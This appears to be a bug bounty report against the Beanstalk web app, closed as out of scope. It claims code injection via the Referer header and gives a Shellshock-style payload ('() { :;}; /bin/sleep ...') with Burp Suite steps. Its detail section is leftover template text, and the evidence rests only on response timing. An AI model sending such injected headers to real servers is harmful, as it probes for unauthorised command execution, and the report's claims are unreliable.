Beanstalk Notion
Beanstalk Notion
/
🪲
Bug Reports
/
BIC Notes
/
📄
Report #34606
📄

Report #34606

Report Date
August 17, 2024
Status
Closed
Payout

Code injection in Referer Head

‣
Report Info

Report ID

#34606

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

Application appears to evaluate user input as code

Description

The application appears to evaluate user input as code. It was instructed to sleep for 0 seconds, and a response time of 4.02699995041 seconds was observed. It was then instructed to sleep for 10 seconds, which resulted in a response time of 13.2170000076 seconds.

Vulnerability Details

It was instructed to sleep for 0 seconds, and a response time of 4.02699995041 seconds was observed. It was then instructed to sleep for 10 seconds, which resulted in a response time of 13.2170000076 seconds. Offer a detailed explanation of the vulnerability itself. Do not leave out any relevant information. Code snippets should be supplied whenever helpful, as long as they don’t overcrowd the report with unnecessary details. This section should make it obvious that you understand exactly what you’re talking about, and more importantly, it should be clear by this point that the vulnerability does exist.

Impact Details

Remote Code Execution (RCE)

  • Attackers could inject and execute arbitrary code on the server.

Data Breach -If the injected code allows attackers to access the database or file system, sensitive data could be leaked.

Network Lateral Movement -If the server is part of a larger network, the injected code could be used to move laterally within the network.

Financial Fraud -since the application handles financial transactions, injected code could be used to manipulate transaction data.

Reputation Damage

  • Public disclosure of a code injection vulnerability, especially if exploited, could severely damage the company's reputation.

Proof of concept

In browser: Visit the URL https://app.bean.money.manifest.json in your browser, and Burp Suite will intercept the request. In BurpSuite: Intercept the Request and forward it to Repeater

Modify the Request: insert the HTTP head-Referer: () { :;}; /bin/sleep 0

Send the modified Request and note the 4.02699995041 seconds response time

Back in Repeater:

modify the value of the Referer head to () { :;}; /bin/sleep 11 and send the Request Note the 13.2170000076 seconds response time

Immunefi Response

Immunefi has reviewed this vulnerability report and decided to close since being out of scope for Beanstalk bug bounty program.
  • claimed impact by the whitehat is not in scope for the bug bounty program
  • claimed asset by the whitehat is in scope for the bug bounty program
  • PoC has been submitted to the project
  • claimed severity is in scope for the bug bounty program

The project will now be automatically subscribed and receive a report of the closed submission and can evaluate if they are interested in re-opening it. However, note that they are not under any obligation to do so.